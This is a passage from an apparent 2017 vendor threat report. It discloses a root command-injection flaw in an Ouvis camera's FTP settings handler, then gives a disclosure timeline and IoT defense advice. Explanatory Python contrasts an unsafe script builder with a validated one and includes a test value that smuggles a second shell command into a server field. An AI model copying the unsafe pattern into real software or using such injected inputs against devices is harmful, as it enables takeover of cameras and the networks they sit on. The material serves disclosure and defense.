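        scheme = "none (empty password)" if pw == "" else identify_scheme(pw)
        result[user] = (int(uid), shell, pw, scheme)
    return result


def shared_hashes(images):
    """images: {image_name: passwd_text}. Return {(user, hash): [images]}
    for hashes that recur across images: a hard-coded credential common
    to the whole product line, like the shared Ouvis root hash."""
    seen = defaultdict(set)
    for name, text in images.items():
        for user, (_uid, _shell, h, _scheme) in login_accounts(text).items():
            if h:
                seen[(user, h)].add(name)
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}
```

An empty password field is reported rather than skipped because on these devices it means passwordless login, which is worse than a strong hash; a locked account (`*` or `!`) is the only safe outcome for a debug CLI that ships to customers.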

Authenticated Remote Code Execution VulnerabilityIn auditing IoT devices like webcams, our research team frequently finds web application flaws in web management

portals due to un-sanitized inputs. After finding a remote code execution vulnerability in one of the web management

pages of a similar IoT camera, the team checked the same location (FTP backup settings) for this Ouvis camera, and

found the exact same vulnerability (see our Q4 report for more details on the previous issue).

Figure 21: Hashed root password

A packet capture of DNS traffic from the camera showed an attempted name resolution for ‘rce.bad’, confirming the remote code execution vulnerability.

As it turned out, the Common Gateway Interface (CGI) handler for FTP configuration (set_ftp.cgi) did not sanitize the user input before saving it to an FTP upload script located at /tmp/ftpupload.sh. The camera runs this script as a privileged user, which in turn executes any command an attacker injects into this un-sanitized input (in our example, the ping command).

This serious vulnerability could allow attackers to execute any command on this camera as root, thus elevating their privileges. However, this is an “authenticated” vulnerability, meaning the attacker must already have valid management credentials in order to exploit this flaw.
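To make the root cause concrete, the Python below is an added example, not the camera’s firmware or code from the report. It models a set_ftp.cgi-style handler in two forms: the unsafe pattern the report describes, where form fields are pasted straight into the upload script that a privileged process later runs, and a hardened form that allow-lists each field and shell-quotes it before the script is written, returning HTTP 400 instead of touching the script when input is rejected. The function names, the curl upload command and the form field names (server, user, path) are assumptions for illustration.

```python
import re
import shlex
from dataclasses import dataclass

# Hostname or dotted-quad IP: one or more labels of letters, digits and
# hyphens (no leading or trailing hyphen), separated by dots. Anything the
# shell could interpret (spaces, ';', '|', '`', '$', quotes) never matches
# this pattern, so it is rejected up front.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOST_RE = re.compile(rf"^(?=.{{1,253}}$){_LABEL}(?:\.{_LABEL})*$")
_USER_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")
_PATH_RE = re.compile(r"^/[A-Za-z0-9._/-]{0,255}$")


@dataclass(frozen=True)
class FtpSettings:
    server: str
    user: str
    path: str


def build_upload_script_unsafe(server: str, user: str, path: str) -> str:
    """The pattern the report describes: form fields are interpolated into
    the upload script verbatim, so whatever the user typed is later parsed
    by the shell that runs the script as root. Kept here only to show
    how the injected text ends up inside the script."""
    return (
        "#!/bin/sh\n"
        f"curl -T /tmp/snapshot.jpg ftp://{user}@{server}{path}\n"
    )


def validate_ftp_settings(server: str, user: str, path: str) -> FtpSettings:
    """Allow-list validation: accept only a plain hostname, a simple
    username and an absolute path; reject everything else before it gets
    anywhere near a script."""
    if not _HOST_RE.match(server):
        raise ValueError("invalid FTP server")
    if not _USER_RE.match(user):
        raise ValueError("invalid FTP user")
    if not _PATH_RE.match(path):
        raise ValueError("invalid FTP path")
    return FtpSettings(server, user, path)


def build_upload_script_safe(settings: FtpSettings) -> str:
    """Second layer: even after validation, quote every interpolated value
    so the shell sees each one as a single literal word."""
    url = f"ftp://{settings.user}@{settings.server}{settings.path}"
    argv = ["curl", "-T", "/tmp/snapshot.jpg", url]
    return "#!/bin/sh\n" + " ".join(shlex.quote(a) for a in argv) + "\n"


def handle_set_ftp(form: dict) -> tuple:
    """Hypothetical hardened handler for a set_ftp.cgi-style request.
    Returns (HTTP status, body); on rejected input it answers 400 and the
    script on disk is never rewritten."""
    try:
        settings = validate_ftp_settings(
            form.get("server", ""), form.get("user", ""), form.get("path", "/")
        )
    except ValueError as exc:
        return 400, str(exc)
    return 200, build_upload_script_safe(settings)


if __name__ == "__main__":
    # Constructed inputs: a well-formed server name and one carrying a shell
    # metacharacter, as a user of the web UI might submit.
    good = {"server": "ftp.example.net", "user": "cam", "path": "/uploads"}
    bad = {"server": "ftp.example.net; echo injected", "user": "cam", "path": "/uploads"}
    print(build_upload_script_unsafe(bad["server"], bad["user"], bad["path"]))
    print(handle_set_ftp(good))
    print(handle_set_ftp(bad))
```

Two design points are worth noting. The validator is an allow-list of what a hostname, user and path may look like rather than a deny-list of shell metacharacters, so it does not need to anticipate every trick the shell accepts. Quoting is kept as a separate layer because either control alone can be bypassed by a later code change; a third, not shown, would be to run the upload as an unprivileged user so that even a successful injection no longer yields root.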

Conclusion

After confirming both vulnerabilities, our researchers immediately submitted a report to Ouvis via their support contact. Ouvis did not respond to our disclosure attempts over a 90-day period.

After 60 days, a separate researcher disclosed the same, and further vulnerabilities in a series of cameras appearing to be manufactured by the same OEM supplier. Because the Ouvis C2 was not present in Pierre Kim’s list of affected models, we continued the originally planned 90-day disclosure period. After no contact from the vendor, we responsibly disclosed this research publicly on April 24, 2017.

Timeline

• 2 January 2017 – Vulnerabilities discovered

• 4 January 2017 – Reported to manufacturer

• 3 February 2017 – Manufacturer contacted a second time

• 6 March 2017 – Manufacturer informed of imminent public disclosure

• 8 March 2017 – Similar vulnerabilities zero day’d by Pierre Kim

• 3 April 2017 – Manufacturer contacted a final time

• 24 April 2017 – Public Disclosure


WatchGuard Threat Lab’s IoT Research Project

WatchGuard Threat Lab’s Research Defense Learnings

Our research shows consumer IoT devices continue to ship with weaknesses and security vulnerabilities. At best, these issues could result in loss of privacy for consumers. At worst, they might allow attackers to take over these devices, gaining a foothold into your internal network.

Consumers should take steps to secure the IoT devices they purchase, as well as urge device manufacturers to focus on security. At a minimum, here are three IoT defense strategies that help.

1. Avoid exposing CLI management interfaces to the Internet

Most IoT devices have no legitimate need for CLI access via Telnet or SSH. If you port scan your IoT device and find open CLI access, take extra caution while deploying it. Implement network firewall rules to block inbound Telnet and SSH access not only from the Internet, but from other internal networks as well (to prevent attack pivoting).

2. Avoid IoT devices with hard-coded backdoor accounts

Some manufacturers ship IoT devices with set accounts that have the same hard-coded password for all devices. If consumers are unaware of the account, it’s essentially a backdoor. Before purchasing an IoT device, research the manufacturer’s history in securing their products. Avoid vendors that are known to include hard-coded backdoor accounts in their IoT devices.

3. Change default passwords

IoT manufacturers often hardcode weak or non-existent passwords to make their products easier to use (at the risk of security). When first setting up a new IoT device your first task should be setting new, difficult-to-guess passwords wherever possible.

Defense Highlights

Conclusion & Defense Highlights

One lesson you learn if you follow any trend over time is things change. Sometimes they change at a glacial pace, so slowly that you may not notice the alterations. Other times they change overnight, so quickly that you can’t get your bearings straight. This constant change applies directly to the threat and security landscape as well.

This quarter, we saw some of the same malware and network attacks retain their place on our top threat lists. However, we also saw new threats and exploits replace the old ones. For instance, macro malware – a top threat from Q4 2016 – dropped off our list, becoming less relevant in Q1. Meanwhile, we saw three times as much Linux malware as we did before, suggesting attackers have increased their efforts to target IoT.

When change happens unexpectedly, it feels scary, and can cause unforeseen surprises that hurt when they hit you unprepared. However, change doesn’t have to be scary. In fact, when you vigilantly monitor change, you can adapt and prepare for it, protecting yourself from unanticipated consequences.

That’s the whole point of this quarterly security report – to prepare you for change in the threat landscape. By staying current with the latest threat trends, you can adapt your technical and social security strategies to defend against evolving threats.

Throughout this report, we shared detailed defense lessons for the individual trends we identified. We’ll end with a few final high-level defense strategies every organization should consider.

Basic security policies still block many threats

Security experts often spend much of their time talking about the most sophisticated threats. We get excited about new zero day exploits, the latest kernel rootkits, and other never-before-seen attacks and evasion techniques. From a security expert’s perspective, it makes sense to focus on the more interesting, advanced threats, which will surely become more common in the future. However, our data shows that the top threats aren’t always new or sophisticated. In fact, most of the popular network attacks we saw this quarter exploited old vulnerabilities that were patched long ago. Many of the top malware samples we identified were well-known examples, which attackers have used for years. Even the vulnerabilities we found in IoT devices were very standard weaknesses that have simple solutions. The point is, you can prevent a significant slice of these threats just by following some basic security practices. Patch your software often. Avoid opening unsolicited files, or clicking unexpected links. Firewall your IoT devices. These simple practices still do help.

Basic firewalls are incomplete without other security layers

Firewalls remain a critical part of our security infrastructure. You must limit the network services you expose to the Internet (as proven with unsecure IoT devices). However, a firewall alone is not enough. Today, most attacks don’t target exposed services directly, but rather target your users instead. Even with a firewall, almost all organizations open holes allowing their users to reach the web, get email, or transfer files (among other things). To protect against today’s client-side attacks, you must also implement a suite of security services, such as intrusion prevention, anti-malware, IP and URL filtering, and more to monitor the services you allow through your firewall for malicious activity. If you don’t yet have a layered security strategy, consider a unified threat management platform that combines basic firewalling with many other layers of protection.

Segment and harden your IoT devices

In the current state of the industry, IoT devices can’t yet be trusted. While there are certainly exceptions, our research, as well as other industry research, suggests the vast majority of IoT devices have major security weaknesses, and can pose a threat to the rest of your network. You might presume criminals don’t care about your webcams, refrigerators, or DVRs, but attackers know they can use these local devices to reach more important computers in your network. Since manufacturers are shipping these devices with vulnerabilities, it’s up to you to secure them. First, firewall IoT devices from the Internet and only expose necessary services. In fact, we recommend you segment them on your internal network, too. That way if someone hijacks your IoT device, they don’t immediately gain access to everything else. Finally, remember to change default passwords, disable unnecessary services, and patch these products as often as possible.

Invest in advanced malware prevention

We said it last quarter, and it remains true this quarter: if you don’t have an advanced malware protection solution, you will eventually get infected. While many of the threats we see are well known, it’s clear attackers regularly repackage their old malware to evade pattern-based detection. This quarter we learned that 38% – over one third – of the malware we detected got past legacy signature-based AV solutions. The industry has long understood the weakness in reactive, pattern-based AV, but this problem has reached a critical mass. More and more victims are getting infected with threats like ransomware despite having basic protection. To catch today’s more evasive malware, you need solutions that use more proactive detection techniques, such as behavioral analysis, or machine learning and big data analytics. We recommend you invest in an advanced malware solution. If you’re a WatchGuard customer, our APT Blocker and Threat Detection and Response offerings provide this service.

Summary

If you made it this far, thank you for reading our report to the end. We hope you found the trends and analysis enlightening, and use these learnings to protect your networks and organizations. Feel free to share any feedback you have about the report with [email protected], and join us next quarter.

About WatchGuard Threat Lab

WatchGuard’s Threat Lab (previously the LiveSecurity Threat Team) is a group of dedicated threat researchers committed to discovering and studying the latest malware and Internet attacks. The Threat Lab team analyzes data from WatchGuard’s Firebox Feed, internal and partner threat intelligence, and a research honeynet, to provide insightful analysis about the top threats on the Internet. Their smart, practical security advice will enable you to better protect your organization in the ever-changing threat landscape.

About WatchGuard Technologies

WatchGuard® Technologies, Inc. is a global leader in network security, providing best-in-class Unified Threat Management, Next Generation Firewall, secure Wi-Fi, and network intelligence products and services to more than 80,000 customers worldwide. The company’s mission is to make enterprise-grade security accessible to companies of all types and sizes through simplicity, making WatchGuard an ideal solution for distributed enterprises and SMBs. WatchGuard is headquartered in Seattle, Washington, with offices throughout North America, Europe, Asia Pacific, and Latin America. To learn more, visit WatchGuard.com.

For additional information, promotions and updates, follow WatchGuard on Twitter @WatchGuard, on Facebook, and on the LinkedIn Company page. Also, visit our InfoSec blog, Secplicity, for real-time information about the latest threats and how to cope with them at www.secplicity.org.

Corey Nachreiner
Chief Technology Officer

Recognized as a thought leader in IT security, Nachreiner spearheads WatchGuard’s technology vision and direction. Previously, he was the director of strategy and research at WatchGuard. Nachreiner has operated at the frontline of cyber security for 16 years, and for nearly a decade has been evaluating and making accurate predictions about information security trends. As an authority on network security and internationally quoted commentator, Nachreiner’s expertise and ability to dissect complex security topics make him a sought-after speaker at forums such as Gartner, Infosec and RSA. He is also a regular contributor to leading publications including CNET, Dark Reading, eWeek, Help Net Security, Information Week and Infosecurity, and delivers WatchGuard’s “Daily Security Byte” video on Facebook.

Marc Laliberte
Security Threat Analyst

Specializing in network security technologies, Marc’s industry experience allows him to conduct meaningful information security research and educate audiences on the latest cyber security trends and best practices. With speaking appearances at IT conferences and regular contributions to online IT and security publications, Marc is a security expert who enjoys providing unique insights and guidance to all levels of IT personnel.

© 2017 WatchGuard Technologies, Inc. All rights reserved. WatchGuard, the WatchGuard logo, LiveSecurity, and Firebox are registered trademarks of WatchGuard Technologies, Inc. in the United States and/or other countries. All other tradenames are the property of their respective owners. Part No. WGCE67003_062017